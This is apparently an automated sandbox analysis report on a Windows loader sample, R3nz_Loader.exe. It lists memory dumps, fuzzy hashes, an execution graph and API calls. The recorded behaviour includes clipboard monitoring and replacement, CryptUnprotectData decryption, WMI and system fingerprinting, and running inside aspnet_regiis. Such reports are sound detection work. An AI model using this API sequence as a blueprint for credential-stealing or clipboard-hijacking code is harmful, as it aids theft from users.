                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: C:\Users\user\Desktop\R3nz_Loader.exe
                                                                              • API String ID: 0-394733233
                                                                              • Opcode ID: 97671da4c4471acc57f28490bf179452a60e87d5c7f515e6ac50f74f1cdd9912
                                                                              • Instruction ID: afa3f6679cf6fcec6b02874cab5fa7db45868bfcc729759757c54513ad73933b
                                                                              • Opcode Fuzzy Hash: 97671da4c4471acc57f28490bf179452a60e87d5c7f515e6ac50f74f1cdd9912
                                                                              • Instruction Fuzzy Hash: A341A271E04254AFDB11DF99C9949DEBBF8EFA6318F3040AAE424D7740D7708A46CB50
                                                                              Function 6CEF76F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 6CEF75AF: EnterCriticalSection.KERNEL32(00000001,?,6CEF7FEE,?,6CF00400,00000010,6CEF6107,00000000,00000000,?,?,?,?,6CEF614B,?,00000000), ref: 6CEF75CA
                                                                              • FlushFileBuffers.KERNEL32(00000000,6CF003E0,0000000C,6CEF77F7,d`l,?,00000001,?,6CEF6064,?), ref: 6CEF7739
                                                                              • GetLastError.KERNEL32 ref: 6CEF774A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2236926030.000000006CEE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CEE0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2236900845.000000006CEE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236961655.000000006CEFB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2236989771.000000006CF01000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2237060285.000000006CF4D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6cee0000_R3nz_Loader.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                                                                              • String ID: d`l
                                                                              • API String ID: 4109680722-4007956071
                                                                              • Opcode ID: dae9eb59fa67060f953722d0b8d3849705bc30a37d9df971d64e7e8b724b16c0
                                                                              • Instruction ID: e9d987d34ce38fe6d6990a94068cdf6dc1ed10f67d07ed21dc7619c1109ad7d2
                                                                              • Opcode Fuzzy Hash: dae9eb59fa67060f953722d0b8d3849705bc30a37d9df971d64e7e8b724b16c0
                                                                              • Instruction Fuzzy Hash: 53018C72A10304DFC7009FA8D844A8EBBB1AF49728F20421EE931DB7D0DBB4D9028B90

                                                                              Execution Graph

                                                                              Execution Coverage:11.3%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:28.2%
                                                                              Total number of Nodes:305
                                                                              Total number of Limit Nodes:29
                                                                              execution_graph 14068 276cd76 CoInitializeEx CoInitializeEx 14069 2782e78 14070 2782e80 14069->14070 14071 2782e90 RtlExpandEnvironmentStrings 14070->14071 14072 2782eaf 14071->14072 14072->14072 14080 279fd30 14072->14080 14075 2783117 14079 27833b7 14075->14079 14084 2780d80 14075->14084 14076 2783101 GetLogicalDrives 14078 279fd30 LdrInitializeThunk 14076->14078 14077 2782fb1 14077->14075 14077->14076 14077->14077 14078->14075 14081 279fd50 14080->14081 14082 279fe8e 14081->14082 14099 279cca0 LdrInitializeThunk 14081->14099 14082->14077 14100 279fba0 14084->14100 14086 27814c5 14086->14079 14087 2780dc0 14087->14086 14104 279b100 14087->14104 14089 2780dfe 14098 2780e54 14089->14098 14107 279cca0 LdrInitializeThunk 14089->14107 14090 278145c 14092 279b120 RtlFreeHeap 14090->14092 14094 278146c 14092->14094 14093 279b100 RtlAllocateHeap 14093->14098 14094->14086 14113 279cca0 LdrInitializeThunk 14094->14113 14098->14090 14098->14093 14108 279cca0 LdrInitializeThunk 14098->14108 14109 279b120 14098->14109 14099->14082 14101 279fbc0 14100->14101 14101->14101 14102 279fcde 14101->14102 14114 279cca0 LdrInitializeThunk 14101->14114 14102->14087 14115 279e220 14104->14115 14106 279b10a RtlAllocateHeap 14106->14089 14107->14089 14108->14098 14110 279b133 14109->14110 14111 279b135 14109->14111 14110->14098 14112 279b13a RtlFreeHeap 14111->14112 14112->14098 14113->14094 14114->14102 14116 279e230 14115->14116 14116->14106 14116->14116 14117 278def0 CoSetProxyBlanket 14256 276ddbe 14260 27697d0 14256->14260 14258 276ddc5 CoUninitialize 14259 276ddf0 14258->14259 14261 27697e4 14260->14261 14261->14258 14262 27805b0 14263 27805be 14262->14263 14266 2780610 14262->14266 14268 27806d0 14263->14268 14269 27806e0 14268->14269 14270 279fd30 LdrInitializeThunk 14269->14270 14271 27807af 14270->14271 14118 279d370 14119 279d390 14118->14119 14122 279cca0 LdrInitializeThunk 14119->14122 14121 279d446 14122->14121 14123 27787fe 14124 2778803 14123->14124 14134 279b4c0 14124->14134 14126 277881e 14127 27788c1 14126->14127 14128 2778b90 14126->14128 14131 2778953 14126->14131 14132 2778980 14126->14132 14138 277be80 14127->14138 14129 277be80 3 API calls 14128->14129 14129->14131 14132->14128 14132->14131 14132->14132 14133 279fd30 LdrInitializeThunk 14132->14133 14133->14132 14135 279b52e 14134->14135 14136 279b4cf 14134->14136 14135->14126 14136->14135 14141 279cca0 LdrInitializeThunk 14136->14141 14140 277bea5 14138->14140 14139 27743d0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14139->14140 14140->14139 14141->14135 14142 279d573 14143 279d585 14142->14143 14145 279d5fe 14143->14145 14148 279cca0 LdrInitializeThunk 14143->14148 14144 279d68e 14145->14144 14149 279cca0 LdrInitializeThunk 14145->14149 14148->14145 14149->14144 14272 276cf3d CoInitializeSecurity CoInitializeSecurity 14273 4d01000 14274 4d01102 14273->14274 14275 4d01012 14273->14275 14276 4d01030 Sleep 14275->14276 14277 4d0103a OpenClipboard 14275->14277 14276->14275 14278 4d010f9 GetClipboardSequenceNumber 14277->14278 14279 4d0104a GetClipboardData 14277->14279 14278->14275 14280 4d010f3 CloseClipboard 14279->14280 14281 4d0105a GlobalLock 14279->14281 14280->14278 14281->14280 14282 4d0106b GlobalAlloc 14281->14282 14284 4d010e9 GlobalUnlock 14282->14284 14285 4d0109d GlobalLock 14282->14285 14284->14280 14286 4d010b0 14285->14286 14287 4d010b9 GlobalUnlock 14286->14287 14288 4d010e0 GlobalFree 14287->14288 14289 4d010cb EmptyClipboard SetClipboardData 14287->14289 14288->14284 14289->14284 14289->14288 14150 278be6e 14151 278be90 14150->14151 14151->14151 14152 278c1fa GetPhysicallyInstalledSystemMemory 14151->14152 14153 278c220 14152->14153 14153->14153 14290 277062f 14291 2770649 14290->14291 14292 2770852 RtlExpandEnvironmentStrings 14291->14292 14296 276eb22 14291->14296 14293 27708c9 14292->14293 14294 2770952 RtlExpandEnvironmentStrings 14293->14294 14293->14296 14294->14296 14297 27709d2 14294->14297 14298 2775050 14297->14298 14299 2775070 14298->14299 14300 279fba0 LdrInitializeThunk 14299->14300 14301 277521d 14300->14301 14302 277523f 14301->14302 14307 2775435 14301->14307 14310 27754d2 14301->14310 14316 277527c 14301->14316 14319 279fee0 14301->14319 14304 27755ed 14302->14304 14302->14307 14302->14310 14302->14316 14323 279ffb0 14302->14323 14308 279fee0 LdrInitializeThunk 14304->14308 14311 2775641 14304->14311 14314 2775682 14304->14314 14304->14316 14307->14316 14330 279cca0 LdrInitializeThunk 14307->14330 14308->14311 14312 279fba0 LdrInitializeThunk 14310->14312 14313 279ffb0 LdrInitializeThunk 14311->14313 14311->14314 14312->14304 14313->14314 14318 277573e 14314->14318 14329 279cca0 LdrInitializeThunk 14314->14329 14316->14296 14316->14316 14317 27758d0 CryptUnprotectData 14317->14316 14318->14316 14318->14317 14320 279ff00 14319->14320 14321 279ff5e 14320->14321 14331 279cca0 LdrInitializeThunk 14320->14331 14321->14302 14325 279ffd0 14323->14325 14324 277526d 14324->14304 14324->14307 14324->14310 14324->14316 14327 27a002e 14325->14327 14332 279cca0 LdrInitializeThunk 14325->14332 14327->14324 14333 279cca0 LdrInitializeThunk 14327->14333 14329->14318 14330->14316 14331->14321 14332->14327 14333->14324 14154 276d66b 14156 276d6d0 14154->14156 14155 276d70e 14156->14155 14158 279cca0 LdrInitializeThunk 14156->14158 14158->14155 14159 276d3e9 14160 276d400 14159->14160 14163 2797ba0 14160->14163 14162 276d52e 14164 2797bd0 CoCreateInstance 14163->14164 14166 27983bb 14164->14166 14167 2797e30 14164->14167 14168 27983cb GetVolumeInformationW 14166->14168 14167->14167 14169 2797f1a SysAllocString 14167->14169 14178 27983ec 14168->14178 14170 2797f43 14169->14170 14171 2797f4b CoSetProxyBlanket 14170->14171 14172 27983aa SysFreeString 14170->14172 14173 2797f6b SysAllocString 14171->14173 14174 27983a0 14171->14174 14172->14166 14176 2798020 14173->14176 14174->14172 14176->14176 14177 2798052 SysAllocString 14176->14177 14181 2798076 14177->14181 14178->14162 14179 2798387 SysFreeString SysFreeString 14179->14174 14180 279837d 14180->14179 14181->14179 14181->14180 14182 27980ba VariantInit 14181->14182 14184 2798110 14182->14184 14183 279836c VariantClear 14183->14180 14184->14183 14185 279d15b 14186 279d190 14185->14186 14187 279d31e 14186->14187 14189 279cca0 LdrInitializeThunk 14186->14189 14189->14187 14190 278a9da 14191 278a9dd GetComputerNameExA 14190->14191 14335 276e592 14336 276e59e 14335->14336 14373 2782d70 14336->14373 14338 276e5a4 14339 2783400 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14338->14339 14340 276e5c0 14339->14340 14341 27836b0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14340->14341 14342 276e5dc 14341->14342 14343 2785210 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 14342->14343 14344 276e5f5 14343->14344 14345 2785a60 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14344->14345 14346 276e5fe 14345->14346 14347 2785de0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14346->14347 14348 276e607 14347->14348 14349 2788890 RtlExpandEnvironmentStrings 14348->14349 14350 276e610 14349->14350 14351 2787690 RtlExpandEnvironmentStrings 14350->14351 14352 276e62c 14351->14352 14353 2792590 6 API calls 14352->14353 14354 276e651 14353->14354 14355 2782d70 RtlExpandEnvironmentStrings 14354->14355 14356 276e666 14355->14356 14357 2783400 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14356->14357 14358 276e682 14357->14358 14359 27836b0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14358->14359 14360 276e69e 14359->14360 14361 2785210 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 14360->14361 14362 276e6b7 14361->14362 14363 2785a60 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14362->14363 14364 276e6c0 14363->14364 14365 2785de0 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14364->14365 14366 276e6c9 14365->14366 14367 2788890 RtlExpandEnvironmentStrings 14366->14367 14368 276e6d2 14367->14368 14369 2787690 RtlExpandEnvironmentStrings 14368->14369 14370 276e6ee 14369->14370 14371 2792590 6 API calls 14370->14371 14372 276e713 14371->14372 14374 2782dc0 14373->14374 14374->14374 14375 2782de5 RtlExpandEnvironmentStrings 14374->14375 14376 2782e30 14375->14376 14376->14376 14193 276ac50 14196 276ac80 14193->14196 14194 276b0a8 14195 279b120 RtlFreeHeap 14195->14194 14196->14194 14196->14195 14377 2768790 14379 276879f 14377->14379 14378 2768a2c ExitProcess 14379->14378 14380 27687b4 GetCurrentProcessId GetCurrentThreadId 14379->14380 14390 2768a1e 14379->14390 14381 27687e0 SHGetSpecialFolderPathW 14380->14381 14382 27687dc 14380->14382 14384 2768890 14381->14384 14382->14381 14384->14384 14385 279b100 RtlAllocateHeap 14384->14385 14386 27688de GetForegroundWindow 14385->14386 14388 2768963 14386->14388 14389 2768a15 14388->14389 14391 2768a10 14388->14391 14389->14390 14396 279cbf0 14390->14396 14393 276b840 FreeLibrary 14391->14393 14394 276b85c 14393->14394 14395 276b861 FreeLibrary 14394->14395 14395->14389 14399 279e200 14396->14399 14398 279cbf5 FreeLibrary 14398->14378 14400 279e209 14399->14400 14400->14398 14197 279b150 14198 279b170 14197->14198 14199 279b1be 14198->14199 14207 279cca0 LdrInitializeThunk 14198->14207 14200 279b372 14199->14200 14201 279b100 RtlAllocateHeap 14199->14201 14204 279b21a 14201->14204 14203 279b120 RtlFreeHeap 14203->14200 14206 279b27e 14204->14206 14208 279cca0 LdrInitializeThunk 14204->14208 14206->14203 14207->14199 14208->14206 14209 27966d0 14211 27966e8 14209->14211 14210 27966f6 GetUserDefaultUILanguage 14212 2796723 14210->14212 14211->14210 14401 2797810 14402 2797835 14401->14402 14405 2797901 14402->14405 14410 279cca0 LdrInitializeThunk 14402->14410 14404 2797b2e 14405->14404 14407 2797a07 14405->14407 14409 279cca0 LdrInitializeThunk 14405->14409 14407->14404 14411 279cca0 LdrInitializeThunk 14407->14411 14409->14405 14410->14402 14411->14407 14412 2769f18 14413 2769f30 14412->14413 14413->14413 14414 2769fba LoadLibraryExW 14413->14414 14415 2769fcb 14414->14415 14416 278208a 14419 278209c 14416->14419 14420 278211d 14416->14420 14417 2782a98 14417->14420 14429 279cca0 LdrInitializeThunk 14417->14429 14418 2782767 14424 2782112 14419->14424 14427 279cca0 LdrInitializeThunk 14419->14427 14422 278261e 14422->14417 14422->14418 14430 279cca0 LdrInitializeThunk 14422->14430 14424->14420 14424->14422 14428 279cca0 LdrInitializeThunk 14424->14428 14427->14424 14428->14422 14429->14417 14430->14422 14431 278a90b 14432 278a915 14431->14432 14432->14432 14433 278a990 GetComputerNameExA 14432->14433 14434 276dd8f 14439 2792700 14434->14439 14440 2792735 GetSystemMetrics GetSystemMetrics 14439->14440 14441 2792778 14440->14441 14213 279cec2 14214 279cee0 14213->14214 14214->14214 14215 279cfb0 GetForegroundWindow 14214->14215 14216 279cfbc 14215->14216 14217 276daca 14220 2771ce0 14217->14220 14219 276dad0 14228 2771cf4 14220->14228 14221 2771ea3 14221->14219 14222 2773aa1 CreateThread 14222->14228 14243 2781fd0 14222->14243 14223 27725c5 RtlExpandEnvironmentStrings 14223->14228 14224 2772894 RtlExpandEnvironmentStrings 14224->14228 14225 279b120 RtlFreeHeap 14225->14228 14228->14221 14228->14222 14228->14223 14228->14224 14228->14225 14229 279cca0 LdrInitializeThunk 14228->14229 14230 279f9e0 14228->14230 14234 27a0130 14228->14234 14229->14228 14232 279fa00 14230->14232 14231 279fb3e 14231->14228 14232->14231 14240 279cca0 LdrInitializeThunk 14232->14240 14236 27a0150 14234->14236 14235 27a01b8 14237 27a026e 14235->14237 14242 279cca0 LdrInitializeThunk 14235->14242 14236->14235 14241 279cca0 LdrInitializeThunk 14236->14241 14237->14228 14240->14231 14241->14235 14242->14237 14244 278ad45 14245 278ad70 14244->14245 14245->14245 14246 278ae5e 14245->14246 14250 279cca0 LdrInitializeThunk 14245->14250 14249 279cca0 LdrInitializeThunk 14246->14249 14249->14246 14250->14246

                                                                              Executed Functions

                                                                              Function 02791847 Relevance: 45.6, APIs: 1, Strings: 25, Instructions: 129COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 2791847-279184e 1 27917dd 0->1 2 2791850-279190d VariantInit 0->2 3 279176a-27917a7 1->3 4 27917df-2791813 1->4 5 279190f-2791912 2->5 3->1 4->0 6 2791971-27919cd 5->6 7 2791914-279196f 5->7 7->5
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: InitVariant
                                                                              • String ID: #$$$)$-$0$2$2$2$5$5$=$@$B$H$J$L$N$P$R$T$V$Z$\$]$^
                                                                              • API String ID: 1927566239-2983549690
                                                                              • Opcode ID: 66cc99f3ed99a1b172d33687fbf521e39bd855b61df5fc0ac3e3c819c78be7f9
                                                                              • Instruction ID: f819a3d8392791041e1ecc565fad4a3233586b31969af140b346bbaec99aad78
                                                                              • Opcode Fuzzy Hash: 66cc99f3ed99a1b172d33687fbf521e39bd855b61df5fc0ac3e3c819c78be7f9
                                                                              • Instruction Fuzzy Hash: B5519D7160D3C08FE365CB38C59874BBFE1AB96308F48595DE4C98B382C6B98909CB57
                                                                              Function 0277062F Relevance: 34.0, APIs: 2, Strings: 17, Instructions: 764COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 10 277062f-2770647 11 2770649-277064c 10->11 12 277067f-27706ad call 2761880 11->12 13 277064e-277067d 11->13 16 27706af-27706b2 12->16 13->11 17 27706d7-27706fb call 2761880 16->17 18 27706b4-27706d5 16->18 21 27706ff-2770703 17->21 22 27706fd-2770729 call 2773f40 17->22 18->16 23 2771191 21->23 29 277072d-277076e call 2768010 call 276a9b0 22->29 30 277072b 22->30 26 2771cc1 23->26 28 2771cc3-2771cc6 call 2761f40 26->28 37 276eb35-276eb63 call 2761f50 28->37 38 276eb2e-2771cd7 28->38 42 2770770-2770773 29->42 30->29 46 276eb67-276eb6a 37->46 44 2770775-277078a 42->44 45 277078c-27707b0 call 2761880 42->45 44->42 53 2770802-277082a call 2773f40 45->53 54 27707b2-27707d3 call 2773f40 45->54 48 276eb70-276ec17 46->48 49 276ec1c-276ec51 call 2761e40 46->49 48->46 55 276ec55 49->55 56 276ec53-276ec72 49->56 65 277082e-27708c5 call 2768010 call 276a9b0 RtlExpandEnvironmentStrings 53->65 66 277082c 53->66 62 27707d7-2770800 call 2768010 call 276a9b0 54->62 63 27707d5 54->63 55->28 64 276ec74-276ec77 56->64 62->53 63->62 68 276eca5-276ecf6 call 2761980 64->68 69 276ec79-276eca3 64->69 80 27708c9-27708cc 65->80 66->65 68->26 78 276ecfc 68->78 69->64 78->26 81 27708ce-2770906 80->81 82 2770908-2770915 80->82 81->80 83 2770917-2770928 call 2768020 82->83 84 277092d-2770946 82->84 83->23 86 277094a-27709a5 call 2768010 RtlExpandEnvironmentStrings 84->86 87 2770948 84->87 92 27709a7-27709cd call 2768020 * 2 86->92 93 27709d2-27709fb call 2768020 86->93 87->86 112 277118f 92->112 101 27709fd-2770a00 93->101 103 2770a02-2770a6c 101->103 104 2770a6e-2770a8d call 2761880 101->104 103->101 110 2770a8f-2770ab0 call 2773f40 104->110 111 2770ade-2770afd 104->111 118 2770ab4-2770adc call 2768010 call 276a9b0 110->118 119 2770ab2 110->119 113 2770aff-2770b02 111->113 112->23 116 2770b04-2770b46 113->116 117 2770b48-2770b90 call 2761b90 113->117 116->113 124 2770b93-2770b96 117->124 118->111 119->118 126 2770bd8-2770c00 call 2761a90 124->126 127 2770b98-2770bd6 124->127 131 2770c06-2770c43 call 2761f40 126->131 132 2771054-27710d3 call 2768be0 call 2775050 126->132 127->124 137 2770c47-2770c67 call 2768010 131->137 138 2770c45 131->138 141 27710d8-27710e9 call 27697d0 132->141 145 2770c69-2770c74 137->145 146 2770c98-2770ca1 137->146 138->137 147 27710eb-27710ff 141->147 148 2771129-2771161 call 2768020 * 2 141->148 149 2770c76-2770c82 call 2774080 145->149 150 2770ca3-2770ca5 146->150 153 2771117-2771127 call 2768020 147->153 154 2771101-2771103 147->154 179 2771176-2771179 148->179 180 2771163-2771174 call 2768020 148->180 165 2770c84-2770c96 149->165 151 2770ca7-2770cae 150->151 152 2770cb3-2770cee call 2761f50 150->152 151->132 167 2770cf5-2770cf8 152->167 153->148 163 2771105-2771113 call 2774220 154->163 176 2771115 163->176 165->146 171 2770d61-2770da8 call 2761880 167->171 172 2770cfa-2770d5f 167->172 181 2770daa-2770dad 171->181 172->167 176->153 183 2771183-277118a call 2768cc0 179->183 184 277117b-277117e call 2768020 179->184 180->179 185 2770db3-2770e33 181->185 186 2770e38-2770e89 call 2761880 181->186 183->112 184->183 185->181 193 2770e8d-2770e90 186->193 194 2770e96-2770f39 193->194 195 2770f3e-2770f92 call 2761b90 193->195 194->193 198 2770f99-2770f9c 195->198 199 2770fd4-277104f call 2761b90 call 27740a0 198->199 200 2770f9e-2770fd2 198->200 199->150 200->198
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ,$-$.$0$3$4$;$@$A$A$B$J$K$V$i$n$r
                                                                              • API String ID: 0-884602667
                                                                              • Opcode ID: 6379ba987d0ad300f6619cad2883e4f3e35b1f19b9afdf0cb4b7151555cedab4
                                                                              • Instruction ID: 49234b0eb253f073fc7d1cc8b9b5a2c4d34ef730afbf516f04157adb5921f985
                                                                              • Opcode Fuzzy Hash: 6379ba987d0ad300f6619cad2883e4f3e35b1f19b9afdf0cb4b7151555cedab4
                                                                              • Instruction Fuzzy Hash: 2E62907260D7808BD7259B38C4983AFBBE2ABD5314F098A2ED8DDD7381D6748905CB53
                                                                              Function 02797BA0 Relevance: 23.5, APIs: 11, Strings: 2, Instructions: 756memorycomCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 205 2797ba0-2797bca 206 2797bd0-2797c29 205->206 206->206 207 2797c2b-2797c39 206->207 208 2797c40-2797c70 207->208 208->208 209 2797c72-2797cae 208->209 210 2797cb0-2797cc4 209->210 210->210 211 2797cc6-2797ce2 210->211 213 2797d78-2797d83 211->213 214 2797ce8-2797cf3 211->214 216 2797d90-2797dce 213->216 215 2797d00-2797d2f 214->215 215->215 217 2797d31-2797d45 215->217 216->216 218 2797dd0-2797e2a CoCreateInstance 216->218 219 2797d50-2797d69 217->219 220 27983bb-27983ea call 279e640 GetVolumeInformationW 218->220 221 2797e30-2797e69 218->221 219->219 223 2797d6b-2797d70 219->223 227 27983ec-27983f0 220->227 228 27983f4-27983f6 220->228 224 2797e70-2797f14 221->224 223->213 224->224 226 2797f1a-2797f45 SysAllocString 224->226 233 2797f4b-2797f65 CoSetProxyBlanket 226->233 234 27983aa-27983b7 SysFreeString 226->234 227->228 229 279840d-2798414 228->229 231 2798420-2798432 229->231 232 2798416-279841d 229->232 235 2798440-2798454 231->235 232->231 236 2797f6b-2797f84 233->236 237 27983a0-27983a6 233->237 234->220 235->235 238 2798456-279846f 235->238 239 2797f90-2797fa4 236->239 237->234 241 2798470-2798497 238->241 239->239 240 2797fa6-279801b SysAllocString 239->240 242 2798020-2798050 240->242 241->241 243 2798499-27984bb call 277da20 241->243 242->242 244 2798052-2798078 SysAllocString 242->244 248 27984c0-27984c8 243->248 250 279807e-27980a0 244->250 251 2798387-2798399 SysFreeString * 2 244->251 248->248 249 27984ca-27984cc 248->249 252 2798400-2798407 249->252 253 27984d2-27984e2 call 27681a0 249->253 258 279837d-2798383 250->258 259 27980a6-27980a9 250->259 251->237 252->229 255 27984e7-27984ee 252->255 253->252 258->251 259->258 260 27980af-27980b4 259->260 260->258 261 27980ba-2798105 VariantInit 260->261 262 2798110-279814f 261->262 262->262 263 2798151-279815f 262->263 264 2798163-2798165 263->264 265 279816b-2798171 264->265 266 279836c-2798379 VariantClear 264->266 265->266 267 2798177-2798181 265->267 266->258 268 27981bd 267->268 269 2798183-2798188 267->269 271 27981bf-27981da call 2768010 268->271 270 279819c-27981a0 269->270 272 2798190 270->272 273 27981a2-27981ab 270->273 280 2798300-2798320 271->280 281 27981e0-27981ea 271->281 275 2798191-279819a 272->275 276 27981ad-27981b0 273->276 277 27981b2-27981b6 273->277 275->270 275->271 276->275 277->275 279 27981b8-27981bb 277->279 279->275 282 279835c-2798368 call 2768020 280->282 283 2798322-279833c 280->283 281->280 284 27981f0-27981f8 281->284 282->266 283->282 285 279833e-279834f 283->285 287 2798200-279820a 284->287 285->282 290 2798351-2798358 285->290 288 279820c-2798211 287->288 289 2798220-2798226 287->289 292 27982a0-27982aa 288->292 293 2798228-279822b 289->293 294 2798245-2798253 289->294 290->282 298 27982ac-27982b2 292->298 293->294 295 279822d-2798243 293->295 296 27982be-27982c7 294->296 297 2798255-2798258 294->297 295->292 301 27982c9-27982cf 296->301 302 27982d1-27982d4 296->302 297->296 299 279825a-279829f 297->299 298->280 300 27982b4-27982b6 298->300 299->292 300->287 303 27982bc 300->303 301->298 304 27982fc-27982fe 302->304 305 27982d6-27982fa 302->305 303->280 304->292 305->292
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(027A268C,00000000,00000001,027A267C,00000000), ref: 02797E22
                                                                              • SysAllocString.OLEAUT32(A719A516), ref: 02797F1F
                                                                              • CoSetProxyBlanket.COMBASE(44FC42A9,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02797F5D
                                                                              • SysAllocString.OLEAUT32(A719A516), ref: 02797FA7
                                                                              • SysAllocString.OLEAUT32(A719A516), ref: 02798053
                                                                              • VariantInit.OLEAUT32(DBDAD9D0), ref: 027980BF
                                                                              • SysFreeString.OLEAUT32(?), ref: 02798391
                                                                              • SysFreeString.OLEAUT32(?), ref: 02798397
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 027983AB
                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,EA02F4D2,00000000,00000000,00000000,00000000), ref: 027983E3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.3270915930.0000000002761000.00000020.00000400.00020000.00000000.sdmp, Offset: 02760000, based on PE: true
                                                                              • Associated: 00000003.00000002.3270891830.0000000002760000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270969965.00000000027A1000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3270997421.00000000027A4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000003.00000002.3271027498.00000000027B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_2760000_aspnet_regiis.jbxd
                                                                              Similarity
                                                                              • API ID: String$AllocFree$BlanketCreateInformationInitInstanceProxyVariantVolume
                                                                              • String ID: EBC@$~%
                                                                              • API String ID: 2247799857-3517279034
                                                                              • Opcode ID: dc9878489313229e02727578310968b8e45f63832644d9e75230d452fcdabd38
                                                                              • Instruction ID: f3670c22c42478866a6646a200e2ada85a3e9ea872c2c00a15349bf23d923e63
                                                                              • Opcode Fuzzy Hash: dc9878489313229e02727578310968b8e45f63832644d9e75230d452fcdabd38
                                                                              • Instruction Fuzzy Hash: 1B322172A483518FE714CF29D88076BBBE1EFC6314F188A2DE9959B391D774D805CB82
                                                                              Function 02782E78 Relevance: 19.7, APIs: 2, Strings: 9, Instructions: 421COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
